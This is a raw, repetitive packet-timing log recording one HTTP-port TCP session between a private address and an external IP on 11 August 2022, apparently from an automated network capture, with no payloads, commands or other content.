Aug 11, 2022 06:57:10.088357925 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.090789080 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.092602015 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.093135118 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.093175888 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.093213081 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.093252897 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.093290091 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.093312979 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.093327999 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.093339920 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.093344927 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.093348980 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.093353033 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.093367100 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.093405008 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.093421936 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.093444109 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.093478918 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.093493938 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.093517065 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.093528032 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.093554974 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.093590021 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.093614101 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.093630075 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.093630075 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.093667030 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.093703985 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.093718052 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.093743086 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.093777895 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.093800068 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.093816042 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.093820095 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.093852997 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.093889952 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.093905926 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.093928099 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.093964100 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.093978882 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.094002008 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.094006062 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.094039917 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.094075918 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.094091892 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.094113111 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.094150066 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.094166994 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.094185114 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.094193935 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.094223022 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.094273090 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.094896078 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.094954967 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.094993114 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.095009089 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.095030069 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.095067024 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.095081091 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.095103979 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.095113993 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.095139980 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.095176935 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.095190048 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.095213890 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.095251083 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.095264912 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.095290899 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.095299959 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.098464012 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.098504066 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.098540068 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.098575115 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.098586082 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.098613024 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.098613977 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.098639965 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.098654032 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.098678112 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.098694086 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.098732948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.098748922 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.098768950 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.098793030 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.098805904 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.098810911 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.098843098 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.098880053 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.098903894 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.098917007 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.098918915 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.098953962 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.098967075 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.098992109 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.099030972 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.099050045 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.099066973 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.099070072 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.099104881 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.099142075 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.099159002 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.099179029 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.099176884 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.099215984 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.099252939 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.099273920 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.099289894 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.099288940 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.099328995 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.099384069 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.102433920 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.102489948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.102528095 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.102565050 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.102602005 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.102624893 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.102637053 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.102642059 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.102679014 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.104093075 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.104145050 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.104171991 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.104213953 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.104216099 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.104250908 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.104289055 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.104302883 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.104326963 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.104338884 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.104363918 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.104412079 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.104682922 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.104851007 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.104890108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.104908943 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.104926109 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.104928970 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.104964018 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.105001926 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.105015039 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.105047941 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.105978012 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.106018066 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.106053114 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.106065035 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.106090069 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.106090069 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.106098890 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.106127024 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.106151104 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.106163025 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.106169939 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.106208086 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.106276989 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.106312990 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.106326103 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.106350899 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.106388092 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.106409073 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.106422901 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.106429100 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.106461048 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.106483936 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.106497049 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.106506109 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.106535912 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.106544018 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.106575966 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.106597900 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.106612921 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.106621027 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.106668949 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.106796980 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.106842995 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.106868982 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.106890917 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.107994080 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.108068943 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.108144999 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.108182907 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.108220100 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.108238935 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.108273983 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.108289957 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.108326912 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.108378887 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.109159946 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.109195948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.109220982 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.109232903 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.109271049 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.109298944 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.109307051 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.109321117 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.109345913 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.109358072 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.110054970 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.110094070 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.110130072 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.110135078 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.110167027 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.110178947 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.110202074 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.110204935 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.110215902 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.110245943 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.110272884 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.110280991 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.110291004 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.110558987 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.111063004 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.111103058 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.111177921 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.111238003 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.111274004 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.111310959 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.111335993 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.111366034 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.111371994 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.111434937 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.111471891 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.111500978 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.111538887 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.111552954 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.111576080 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.111578941 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.111612082 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.111613035 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.111634016 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.111654043 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.111706972 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.111743927 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.111782074 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.111818075 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.111849070 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.111855030 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.111865997 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.111893892 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.111958981 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.115402937 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.115453959 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.115577936 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.117388964 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.117430925 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.117516994 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.117551088 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.119097948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.119138002 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.119174957 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.119224072 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.119265079 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.119302034 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.119327068 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.119338989 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.119399071 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.119631052 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.119673967 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.119734049 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.119749069 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.119771004 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.119812012 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.119851112 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.119889021 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.119889975 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.119977951 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.119987011 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.120244026 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.120301962 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.120333910 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.120378017 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.120414972 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.120451927 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.120452881 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.120491028 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.120708942 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.120718956 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.120933056 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.120973110 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.121011972 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.121028900 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.121049881 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.121087074 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.121120930 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.121124029 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.121139050 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.121161938 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.121175051 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.121200085 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.121216059 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.121237040 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.121247053 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.121275902 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.121314049 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.121326923 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.121351004 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.121412039 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.121490002 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.121530056 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.121563911 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.121568918 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.121591091 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.121607065 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.121632099 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.121645927 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.121685028 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.121707916 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.121721983 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.121761084 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.121784925 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.121797085 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.121835947 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.121850014 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.121891975 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.122597933 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.122641087 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.122680902 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.122705936 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.122715950 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.122725964 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.122746944 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.122790098 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.122829914 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.125628948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.125673056 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.125710964 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.125746965 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.125746965 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.125783920 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.125783920 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.125814915 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.125832081 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.125839949 CEST	80	49736	89.208.103.4	192.168.2.3
